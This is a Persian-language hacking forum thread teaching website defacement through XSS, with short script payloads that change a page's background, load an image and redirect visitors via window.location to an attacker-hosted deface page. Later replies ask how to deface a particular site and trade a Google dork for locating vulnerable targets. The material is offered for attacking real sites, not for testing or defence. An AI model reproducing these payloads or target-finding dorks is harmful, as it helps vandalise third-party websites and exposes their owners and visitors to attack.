پرش به


تصویر

اموزش دیفیس سایت با باگ xss

darkness hacker xss

  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
6 پاسخ برای این موضوع

#1 ارسالی 28 ژانویه 2016 - 12:17

darkness
+848
    OFFLINE
    تاریخ عضویت :
    30 سپتامبر 2015
  • DarknesS HackeR
  • VIP
  • 329 ارسال
    Last Visit 2 هفته قبل
  • Slogan : DARKNESS HACKER
  • Country :
  • Gender : Not Telling
  • Location : IRAN
  • Name : DARKNESS HACKER

سلام 
همانطور که می دانید حمله به تارگت با داشتن باگ xss با محدودیتهای خاصی همراه خواهد بود و از مهمترین نکاتی که میشه در رابطه با این باگ متذکر شد کلاینت ساید بودن اون هستش حالا ما از یک کد جاوا میایم استفاده میکنیم و دیفیس پیج خودمونو فراخوانی میکنیم لازم به ذکر هستش که دیفیس پیج ما ریدایرکت میشه درواقع کلاینتی که کد رو تزریق میکنه فقط میتونه اونو بنینه برای همینه که در سایتهای ثبت دیفیس قابل ثبت نیستش


1-با کد زیر شما قادر خواهید بود رنگ زمینه سایت رو تغییر بدید
 

PHP:
<script>document.body.bgColor="red";</script> 


2-باکد زیر هم عکس موردنظرتونو فراخوانی کنی
 

PHP:
<script>document.body.background="

برای مشاهده این بخش لطفا وارد حساب کاربری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید

;</script> 


3-و برای نمایش دیفیس پیج خوتون میتونید با فرمت html اونو در سایتی قرارداده و با کد زیر فراخوانی کنید:
 

PHP:
<script>window.location="

برای مشاهده این بخش لطفا وارد حساب کاربری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید

;</script> 

 

این سایت برای باگ xss ساخته شده و چند مرحله داره که روش های مختلف باگ xss رو می تونید توش تمرین کنید
لینک:

کد:

برای مشاهده این بخش لطفا وارد حساب کاربری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید


ویرایش شده توسط darkness 28 ژانویه 2016 - 12:19 .

DARKNESS HACKER

 

id Telegram channel:@baxanonymous
 

01_2.png


#2 ارسالی 01 اكتبر 2017 - 04:28

    OFFLINE
    تاریخ عضویت :
    01 اكتبر 2017
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 8 ارسال
    Last Visit نوامبر 23 2017 12:14
  • Slogan : Talebi
  • Country :
  • Gender : Male
  • Location : Iran shiraz
  • Name : Omid
سلام داداش میگم من بخوام
سایت

برای مشاهده این بخش لطفا وارد حساب کاربری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید


رو دیفیس کنم دقیقا چیکار کنم

#3 ارسالی 02 اكتبر 2017 - 01:03

MR.MAGIC
+193
    OFFLINE
    تاریخ عضویت :
    19 ژوئن 2017
  • %100██████████
  • Anonymous
  • 158 ارسال
    Last Visit 4 هفته قبل
  • Slogan : [#I have no claim] [#I Endless see]
  • Country :
  • Gender : Male
  • Location : iran
  • Name : MR.MAGIC

سلام

دورک سایت هایی که باگ xss دارن رو اگه دارید بزارید ممنون


aaaaaaa.png
:rolleyes: همیشه آرزو داشتم جایی وجود داشت که راه های عبور از شکست خوردن و رسیدن به موفقیت سریعتر را به من نشان بدهد و الان این آرزو تیروژ نام دارد. :rolleyes:

:rolleyes: 
[I Have No Claim] [I Endless See] :rolleyes: 

www.tirojshop.ir

TELEGRAM CHANNEL

 


#4 ارسالی 02 اكتبر 2017 - 09:45

    OFFLINE
    تاریخ عضویت :
    29 سپتامبر 2017
  • %10█▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 18 ارسال
    Last Visit اكتبر 07 2017 07:39
  • Country :
  • Gender : Male
  • Location : اصفهان
  • Name : HOSSEIN

سلام

دورک سایت هایی که باگ xss دارن رو اگه دارید بزارید ممنون

گذاشتم ب پست هام سر بزن


HAJI_CRUEL#

 

 

 

#گرگ_خسته


#5 ارسالی 06 اكتبر 2017 - 03:22

M707EBC
+236
    OFFLINE
    تاریخ عضویت :
    21 ژوئن 2017
  • %100██████████
  • Anonymous
  • 105 ارسال
    Last Visit یک هفته قبل
  • Slogan : توانا بُوَد هرکه با ما بُوَد
  • Country :
  • Gender : Male
  • Location : web/htdocs/
  • Name : Information thief

سلام داداش میگم من بخوام سایت

برای مشاهده این بخش لطفا وارد حساب کاربری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید

رو دیفیس کنم دقیقا چیکار کنم

کار ساده ایه متنی که بعد از تگ marquee وجود دارد رو تغییر بدید مثل:

برای مشاهده این بخش لطفا وارد حساب کاربری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید



سلام دورک سایت هایی که باگ xss دارن رو اگه دارید بزارید ممنون

inurl:showcatrows.php?CategoryID=
یه نمونه ساده


We are anonymous

 

Endless forever

 

With complete security

 

Any group standing in front of us will fail

 

Telegram


#6 ارسالی 18 اكتبر 2017 - 05:02

    OFFLINE
    تاریخ عضویت :
    01 اكتبر 2017
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 8 ارسال
    Last Visit نوامبر 23 2017 12:14
  • Slogan : Talebi
  • Country :
  • Gender : Male
  • Location : Iran shiraz
  • Name : Omid
سلام داش من دقیقا نفهمیدم میشه درست توضیح بدی
در باره تزریق کد ها
دورک پایین هم واسه یکی از دوستان ک سوال پرسیدند😐
inurl:"showcatrows.php?CategoryId="

#7 ارسالی 18 اكتبر 2017 - 05:02

    OFFLINE
    تاریخ عضویت :
    01 اكتبر 2017
  • %0▒▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 8 ارسال
    Last Visit نوامبر 23 2017 12:14
  • Slogan : Talebi
  • Country :
  • Gender : Male
  • Location : Iran shiraz
  • Name : Omid
من بجز این دورکی سراغ ندارم





همچنین به darkness hacker, xss نیز برچسب خورده است

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP